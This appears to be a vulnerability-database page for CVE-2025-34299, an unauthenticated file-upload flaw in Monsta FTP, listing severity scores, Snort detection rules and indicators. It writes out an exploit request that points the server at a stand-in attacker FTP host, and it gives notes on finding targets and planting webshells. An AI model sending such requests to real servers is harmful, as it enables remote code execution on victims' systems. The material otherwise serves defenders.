cbcvebase.
CVE-2025-34299
published 2025-11-07

CVE-2025-34299: Monsta FTP versions 2.11 and earlier contain a vulnerability that allows unauthenticated arbitrary file uploads. This flaw enables attackers to execute…

PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
72.54%
99.4th percentile
Monsta FTP versions 2.11 and earlier contain a vulnerability that allows unauthenticated arbitrary file uploads. This flaw enables attackers to execute arbitrary code by uploading a specially crafted file from a malicious (S)FTP server.

Affected

2 ranges
VendorProductVersion rangeFixed in
monsta_limited_of_new_zealandmonsta_ftp<= 2.11
monstaftpmonsta_ftp<= 2.11

Detection & IOCsextracted from sources · hover to see the quote

url/mftp/application/api/api.php
path/mftp/application/api/api.php
path/application/api/api.php
commandrequest={"connectionType":"ftp","configuration":{"host":"<attacker>","username":"nuclei-oast","initialDirectory":"/","password":"test","port":21},"actionName":"downloadFile","context":{"remotePath":"/test.txt","localPath":"/tmp/nuclei-oast-test.txt"}}
otheractionName: downloadFile
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Monsta FTP Arbitrary File Upload Attempt (CVE-2025-34299)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/mftp/application/api/api.php"; http.request_body; content:"|22|actionName|22 3a 22|downloadFile|22|"; fast_pattern; content:"|22|remotePath|22 3a 22 2f|"; content:"|22|localpath|22 3a 22 2f|"; reference:url,labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/; reference:cve,2025-32499; reference:cve,2025-34299; classtype:attempted-admin; sid:2065695; rev:1; metadata:affected_product Monsta_FTP, attack_target Networking_Equipment, tls_state plaintext, created_at 2025_11_07, cve CVE_2025_34299, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_11_07, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Monsta FTP Server Side Request Forgery Attempt (CVE-2022-31827)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/application/api/api.php"; http.request_body; content:"|22|actionName|22 3a 22|fetchRemoteFile|22|"; fast_pattern; content:"|22|source|22 3a 22|http|3a 2f 2f|"; reference:url,labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/; reference:cve,2022-31827; classtype:web-application-attack; sid:2065694; rev:1;)
bytes
|22|actionName|22 3a 22|downloadFile|22|
bytes
|22|remotePath|22 3a 22 2f|
bytes
|22|localpath|22 3a 22 2f|
  • Exploit traffic targets POST /mftp/application/api/api.php with a JSON body containing actionName=downloadFile, remotePath, and localPath fields — all unauthenticated.
  • The attacker supplies an attacker-controlled FTP/SFTP host in the 'host' field of the JSON configuration, causing the server to connect outbound to the malicious server and download a file to an arbitrary localPath.
  • Detect Monsta FTP instances via Shodan/FOFA using the page title 'Monsta FTP' for asset discovery before exploitation.
  • Version fingerprinting: extract version from the JS filename pattern monsta-min-<version>.js in the page body; versions <= 2.11.2 are vulnerable.
  • OOB/OAST detection: the exploit causes an outbound DNS/FTP connection from the victim server to the attacker's host; monitor for unexpected outbound FTP (port 21) connections from web server processes.
  • The localPath parameter in the downloadFile request can be set to web-accessible directories, enabling webshell placement; monitor for new PHP/script files created in web root after POST requests to api.php.
  • ·The Nuclei template targets both /mftp/ and / as base paths with stop-at-first-match, meaning the api.php endpoint may be at /mftp/application/api/api.php or /application/api/api.php depending on installation.
  • ·The Metasploit module uses FTP (not SFTP) to exploit the vulnerability, though the vulnerability also supports SFTP as the connectionType.
  • ·The ET Snort rule for CVE-2025-34299 (sid:2065695) references both CVE-2025-32499 and CVE-2025-34299, suggesting overlap or related CVEs for the same endpoint.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.